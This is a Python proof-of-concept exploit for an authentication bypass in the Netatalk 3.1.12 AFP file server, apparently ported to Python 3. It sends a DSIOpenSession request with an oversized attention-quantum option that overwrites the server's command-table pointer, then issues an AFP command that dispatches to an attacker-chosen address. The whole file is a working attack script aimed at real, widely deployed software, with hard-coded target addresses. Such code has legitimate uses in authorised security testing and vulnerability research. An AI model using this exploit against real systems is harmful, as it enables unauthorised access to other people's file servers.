
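"""Netatalk 3.1.12 DSI OpenSession authentication-bypass proof of concept.

Usage: python3 <script> <ip> <port>

The script speaks the DSI transport used by Netatalk's AFP server:

1. It sends a DSIOpenSession request whose "attention quantum" option carries
   a body longer than the field the server parses it into.  Per the original
   author's annotations, the extra bytes land on the fields that follow the
   quantum in the server's session structure, ending with the pointer to the
   server's AFP command dispatch table.
2. It then sends a DSICommand (AFP) request invoking command index 1, so the
   server dispatches through the now attacker-controlled table entry.

The two 64-bit addresses below were chosen by the original author for one
specific server build; they are not portable and must be re-derived for any
other binary.  Only run this against systems you are authorised to test.

Ported to Python 3: the original used Python 2 ``print`` statements and
``str`` for wire bytes, so it cannot run on any supported interpreter.  Wire
bytes are unchanged.
"""
import socket
import struct
import sys

# DSI header fields (big-endian on the wire).
DSI_FLAG_REQUEST = 0x00
DSI_CMD_AFP = 0x02          # DSICommand
DSI_CMD_OPEN_SESSION = 0x04  # DSIOpenSession

# Values written into the server's session structure by the overflowing option.
# NOTE(review): hard-coded for the author's target build (non-relocatable
# 64-bit binary, judging by the address range) — confirm against your target.
COMMANDS_PTR_OVERWRITE = 0x63B660  # written over the commands-table pointer
JUMP_TARGET = 0x4295F0             # address placed in the fake table entry

# Socket timeout so a non-responsive target does not hang the PoC forever.
SOCKET_TIMEOUT_SECONDS = 10.0


def dsi_request(command: int, request_id: int, payload: bytes) -> bytes:
    """Wrap *payload* in a 16-byte DSI request header.

    Args:
        command: DSI command byte (``DSI_CMD_OPEN_SESSION`` or ``DSI_CMD_AFP``).
        request_id: 16-bit request identifier, sent big-endian.
        payload: bytes that follow the header; its length is written into the
            header's length field.

    Returns:
        The complete request: header followed by *payload*.
    """
    return b"".join([
        bytes([DSI_FLAG_REQUEST, command]),
        struct.pack(">H", request_id),
        b"\x00\x00\x00\x00",               # data offset
        struct.pack(">I", len(payload)),   # total data length, big-endian per DSI
        b"\x00\x00\x00\x00",               # reserved
        payload,
    ])


def build_open_session_request() -> bytes:
    """Build the DSIOpenSession request carrying the oversized quantum option.

    The option body is packed little-endian: the values overwrite in-memory
    fields of the target process, so byte order must follow the target, not
    the host.  The original used native order, which only matched on an
    x86 host; an x86-64 target is assumed here — adjust if yours differs.

    Returns:
        Full DSI request (header + option) ready for ``sendall``.
    """
    option_body = b"".join([
        b"\x00\x00\x40\x00",                      # client quantum
        b"\x00\x00\x00\x00",                      # overwrites datasize
        struct.pack("<I", 0xDEADBEEF),            # overwrites quantum
        struct.pack("<I", 0xFEEDFACE),            # overwrites the ids
        struct.pack("<Q", COMMANDS_PTR_OVERWRITE),  # overwrites commands ptr
    ])
    # Option = type (0x01 = attention quantum), 1-byte length, body.  The
    # length byte is what the vulnerable server trusts when copying the body.
    option = b"\x01" + struct.pack("B", len(option_body)) + option_body
    return dsi_request(DSI_CMD_OPEN_SESSION, 0x0001, option)


def build_afp_request() -> bytes:
    """Build the DSICommand request that dispatches through the fake table.

    The AFP body selects command index 1 (the second table entry), pads out
    the first 8-byte entry, and supplies ``JUMP_TARGET`` as the second entry.

    Returns:
        Full DSI request (header + AFP body) ready for ``sendall``.
    """
    afp_body = b"".join([
        b"\x01",                            # invoke the second entry in the table
        b"\x00",                            # protocol defined padding
        b"\x00\x00\x00\x00\x00\x00",        # pad out the first entry
        struct.pack("<Q", JUMP_TARGET),     # address to jump to
    ])
    return dsi_request(DSI_CMD_AFP, 0x0002, afp_body)


def main(argv: list[str]) -> int:
    """Connect to ``argv[1]:argv[2]`` and send both requests.

    Returns:
        Process exit status (0 on completion; 0 on bad arguments to match
        the original script, which exited silently).
    """
    if len(argv) != 3:
        print(f"usage: {argv[0]} <ip> <port>", file=sys.stderr)
        return 0
    ip = argv[1]
    try:
        port = int(argv[2])
    except ValueError:
        print(f"usage: {argv[0]} <ip> <port>  (port must be an integer)", file=sys.stderr)
        return 2

    print(f"[+] Attempting connection to {ip}:{argv[2]}")
    # The context manager closes the socket on every exit path; the original
    # left it open.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(SOCKET_TIMEOUT_SECONDS)
        sock.connect((ip, port))

        sock.sendall(build_open_session_request())
        sock.recv(1024)  # server's OpenSession reply; content is not inspected
        print("[+] Open Session complete")

        print("[+] Sending get server info request")
        sock.sendall(build_afp_request())
        resp = sock.recv(1024)
        print(resp)

    print("[+] Fin.")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))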